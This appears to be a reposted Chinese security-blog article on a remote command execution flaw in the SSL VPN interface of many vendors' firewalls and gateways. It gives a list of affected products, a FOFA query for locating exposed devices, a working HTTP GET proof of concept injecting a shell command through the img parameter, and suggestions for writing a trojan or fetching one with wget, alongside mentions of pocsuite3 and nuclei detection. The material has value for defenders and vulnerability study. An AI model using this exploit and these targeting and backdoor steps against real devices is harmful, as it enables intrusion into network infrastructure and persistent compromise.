多个安全厂商安全设备远程命令执行漏洞

admin 2023年12月8日09:47:56评论107 views字数 1065阅读3分33秒阅读模式

安全设备通杀漏洞


免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


多个安全厂商安全设备远程命令执行漏洞


一、漏洞描述


此漏洞存在多个品牌厂商的安全设备中,受影响安全产品如下:

H3C-下一代防火墙
安全信息-明御安全网关
MAIPU-安全网关
D-Link-下一代防火墙
Huawei-产品
迈普通信技术股份有限公司安全网关
博达通信-下一代防火墙
任天行网络安全管理系统/安全审计系统
安博通应用网关
烽火网络安全审计
瑞斯康达科技发展股份有限公司安全路由器
任子行网络安全审计系统
绿盟安全审计系统
深圳市鑫塔科技有限公司第二代防火墙
海康威视安全网关
优炫防火墙
SG-8000深度安全网关
网御星云上网行为管理系统
360上网行为审计系统


二、网络空间搜索引擎搜索


fofa查询

body="/webui/images/default/default/alert_close.jpg"


多个安全厂商安全设备远程命令执行漏洞


三、漏洞复现


POC


GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/check.txt|ls HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1

多个安全厂商安全设备远程命令执行漏洞


然后访问路径 :/sslvpn/check.txt 返回如下则证明漏洞存在

多个安全厂商安全设备远程命令执行漏洞


木马写入思路:

1、直接替换POC里面命令写入木马;

2、使用wget命令执行远程下载木马;


四、漏洞检测


pocsuite3漏洞检测

多个安全厂商安全设备远程命令执行漏洞

nuclei 漏洞检测

多个安全厂商安全设备远程命令执行漏洞


漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC




原文始发于微信公众号(网络安全透视镜):多个安全厂商安全设备远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月8日09:47:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   多个安全厂商安全设备远程命令执行漏洞https://cn-sec.com/archives/2278824.html

发表评论

匿名网友 填写信息